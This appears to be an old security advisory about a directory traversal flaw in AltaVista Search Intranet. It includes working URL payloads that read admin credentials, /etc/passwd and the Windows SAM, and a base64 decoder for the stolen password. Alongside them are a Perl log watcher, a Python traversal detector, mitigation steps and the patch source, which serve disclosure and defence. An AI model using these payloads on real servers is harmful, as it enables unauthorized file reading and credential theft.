COMMAND

    altavista search

SYSTEMS AFFECTED

    altavista search intranet 2.??

PROBLEM

    Edward Glowacki posted what Rudi  Carell found.  Edward was   able
    to verify the vulnerability in 2.0b and 2.3a (with the patch)   on
    Digital Unix.   At the  end of  this advisory  is a  simple   perl
    script  Edward  wrote  to  watch  the  log  file and send a  short
    email  when  someone  grabs  the  mgtstate  file.   It can't  stop
    intruders from getting your password,  but at least you can   have
    some idea that your password has escaped.

    The  template-variable:   {mss}  in   the  main   search  function
    (cgi-bin/query?) allows you one traversal step back and shows  you
    any file  in the  "http -  directory".   As for  example, the real
    thing is:

        http://we.loverudi.org:9000/cgi-bin/query?mss=../config

    If you try to go more than one directory back, the program escapes
    {mss} with "@../" ...   Nice try .. but much too late ..  the http
    directory contains some very interesting files:

        ../config               ( Var "MGMT_PW=[ Plaintext MGMT-password ]" )
        ../logs/mgtstate        ( passw=[ encoded mgt-password ]  .. NOT the MGMT-password !!!)
        ../logs/stats.log       ( sometimes stats_log )
        ../logs/access.log      ( sometimes access_log )

    Forget  everything  but  the  "mgtstate"  file.   It  contains the
    username:password for the online-config tool  (X:9000/cgi-bin/mgt)
    in the form:

        passw=[ encoded user:password string ]

    These guys are really smart; they encode their passwords (base64).
    Now we need a program/script to decode the user:password string:

        #!/usr/bin/perl
        use MIME::Base64;
        print decode_base64("$ARGV[0]"), "\n";

    Edward's perl script:

    #!/bin/perl
    #
    # Simple perl script to watch your logfile and notify you if someone tries to
    # get at mgtstate to grab your AltaVista admin password.  Not elegant, but it
    # should work.  It will check the whole log file from the beginning and
    # continue to monitor until interrupted (probably just want to put it in
    # the background and let it go).  Tested on Digital Unix 4.0D. Use at your
    # own risk.
    #
    # usage:  watch logfile email <identifier>
    #   optional identifier to distinguish different servers if needed

    $logfile = "";
    $email = "";
    $identifier = "";

    $logfile = $ARGV[0];
    shift;
    $email = $ARGV[0];
    shift;
    $identifier = $ARGV[0];
    shift;

    if($logfile eq "" || $email eq "") {
        print("Need a logfile and email address, i.e.:\n");
        print("  watch httpd/logs/access_log someone\@somewhere.com\n");
        exit(0);
    }

    open(ACCESS,"/bin/tail -f -c +0 $logfile |") || die "Can't open tail of log file";

    while(<ACCESS>) {
        if(/mgtstate/) {
            open(MAIL,"|/bin/mailx -s \"AltaVista intruder: mgtstate access\" $email");
            if($identifier ne "") {
                print(MAIL "Ident: $identifier\n\n");
            }
            print(MAIL "$_");
            close(MAIL);
        }
    }

    Here are some more bugs in the AV-Search thing...  Using URI-encoded
    strings it is possible to view "any" file on the system.   Examples
    (Unix systems):

        http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd

    or on an MS IIS ...

        http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2f%2e%2e%2f\\winnt\\repair\\sam._

    Interesting information about the file structure ...

        http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2findex/intranet/indexer.log

    or another file which does contain the password...

        http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2findex/intranet/policy.conf
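    Edward's watcher greps for the literal string "mgtstate", so the URI-encoded requests shown above would slip past it. The following is an added example, not code from the advisory, from Edward or from AltaVista: it decodes the mss= value of each access-log line (repeatedly, so double encoding is also caught), flags traversal and the files this advisory names, and runs over constructed log lines; the common-log-format layout and the benign value "simple" are assumptions.

```python
import re
from urllib.parse import unquote

# Files the advisory names as reachable through the mss= traversal.
SENSITIVE = {"mgtstate", "config", "policy.conf", "indexer.log", "passwd", "sam._"}

MSS_RE = re.compile(r'cgi-bin/query\?[^" ]*?\bmss=([^&" ]*)')  # mss= in request line

def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so double-encoded %252e is also seen."""
    for _ in range(rounds):
        new = unquote(value)
        if new == value:
            break
        value = new
    return value

def classify(line):
    """Return (decoded_mss, reasons) for a line carrying mss=, else None."""
    m = MSS_RE.search(line)
    if not m:
        return None
    raw = m.group(1)
    decoded = decode_fully(raw).replace("\\", "/")   # IIS-style backslashes
    reasons = []
    if ".." in decoded.split("/"):
        reasons.append("traversal")
    name = decoded.rstrip("/").rsplit("/", 1)[-1].lower()
    if name in SENSITIVE:
        reasons.append("sensitive:" + name)
    if raw != decoded:
        reasons.append("encoded")
    return decoded, reasons

def scan(lines):
    """Return [(line_no, decoded_mss, reasons)] for every line worth an alert."""
    hits = []
    for n, line in enumerate(lines, 1):
        result = classify(line)
        if result and result[1]:
            hits.append((n, result[0], result[1]))
    return hits

# Constructed sample log lines (not from the advisory); only the first is benign.
LOG = """\
10.0.0.5 - - [01/Dec/1999:10:00:01 -0500] "GET /cgi-bin/query?mss=simple&q=hello HTTP/1.0" 200 512
10.0.0.7 - - [01/Dec/1999:10:00:02 -0500] "GET /cgi-bin/query?mss=../logs/mgtstate HTTP/1.0" 200 80
10.0.0.9 - - [01/Dec/1999:10:00:03 -0500] "GET /cgi-bin/query?mss=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd HTTP/1.0" 200 900
10.0.0.9 - - [01/Dec/1999:10:00:04 -0500] "GET /cgi-bin/query?mss=%2e%2e%2f%2e%2e%2findex/intranet/policy.conf HTTP/1.0" 200 300
""".splitlines()
```

    Feed `scan()` the output of `tail -f` on the access log, as Edward's script does, to alert on the decoded form rather than the literal string.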

SOLUTION

    AltaVista has issued a patch.  To disable this security hole
    temporarily, until you apply the patch, follow the steps detailed
    below:

    - edit <install-dir>/httpd/config file and change MGMT_IPSPEC from
      "0.0.0.0/0" to a specific IP such as "127.0.0.1/32"
    - stop page gathering via management interface
    - restart altavista search service (to re-read config file)
    - restart page gathering if necessary
    - change the username/password through the management interface to
      bogus information
    - exploit  server  and  download  ../logs/mgtstate  (puts file  in
      cache) http://localhost:9000/cgi-bin/query?mss=../logs/mgtstate
    - change the username/password through the management interface to
      something different (but not used anywhere else)
    - avoid restarting the AltaVista service or clearing the cache

    Now when  a user  grabs the  file, they  will get  the old  cached
    information which is now invalid.   This will last for as long  as
    the mgtstate file stays in  the mhttpd's cache (until the  service
    is restarted again).

    The patch is available on AltaVista's Web site at:

        http://doc.altavista.com/business_solutions/search_products/free_downloads/search_intranet.shtml

    The patch  is labeled  "AltaVista Search  Intranet V2.3A  Security
    Patch 12/99".